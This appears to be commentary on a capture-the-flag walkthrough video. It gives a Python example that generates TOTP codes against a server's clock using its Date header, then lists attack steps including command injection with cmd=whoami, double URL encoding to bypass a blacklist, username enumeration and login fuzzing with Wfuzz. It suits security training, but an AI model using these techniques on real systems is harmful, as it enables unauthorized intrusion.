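The clock problem at 46:00 (the OTP only validates if your generator agrees with the server's clock, and the video solves it by disabling NTP and resetting the local clock) can be handled without touching the system clock: read the server's Date header, compute the skew, and generate the code for the server's time. The following is an added example, not code from the video or from stoken. The video's token is RSA SecurID generated by stoken; that algorithm is not reproduced here, so TOTP (RFC 6238, HMAC-SHA1) stands in as the time-based generator. The secret is the RFC 6238 reference key and the Date header is constructed to land on the RFC's first test vector so the expected code is known.

```python
import hashlib
import hmac
import struct
from email.utils import parsedate_to_datetime

# CONSTRUCTED inputs: the RFC 6238 reference secret, and a Date header whose
# timestamp is 59 seconds after the epoch (the RFC's first test vector).
TEST_SECRET = b"12345678901234567890"
TEST_DATE_HEADER = "Thu, 01 Jan 1970 00:00:59 GMT"


def server_skew_seconds(date_header: str, local_now: float) -> float:
    """Seconds to add to the local clock to line up with the server's Date header."""
    server_now = parsedate_to_datetime(date_header).timestamp()
    return server_now - local_now


def totp(secret: bytes, unix_time: float, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP (HMAC-SHA1) for the given absolute time."""
    counter = int(unix_time // step)
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def otp_for_server(secret: bytes, date_header: str, local_now: float) -> str:
    """Generate the code for the server's clock without changing the local clock."""
    return totp(secret, local_now + server_skew_seconds(date_header, local_now))


if __name__ == "__main__":
    # Pretend the attacker's VM is four minutes ahead of the server, as in the video.
    local = 59.0 + 240.0
    print(server_skew_seconds(TEST_DATE_HEADER, local))          # -240.0
    print(totp(TEST_SECRET, local))                               # code for the wrong window
    print(otp_for_server(TEST_SECRET, TEST_DATE_HEADER, local))  # 287082
    # Live use: pass time.time() as local_now and the Date header from any response.
```

Date headers have one-second resolution and include network latency, so the skew is approximate; that is fine for a 30- or 60-second window, and it keeps the attacking host's own clock, logs and TLS validation untouched, which matters more on an engagement than on a lab box.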


Key Takeaways
  1. Enumerate versions of HTTPD and OpenSSH
  2. Check what's listening on port 80
  3. Navigate to the page at 10.10.10.122
  4. Check the list of banned IPs
  5. Try changing the command parameter to cmd=whoami
  6. Use double URL encoding to bypass blacklist filtering
  7. Enumerate user names using a small word list
  8. Use Burp Suite to intercept and analyze HTTP requests
  9. Filter candidate user names from the shared word list with grep and wc
  10. Use Wfuzz to fuzz the login page with a small word list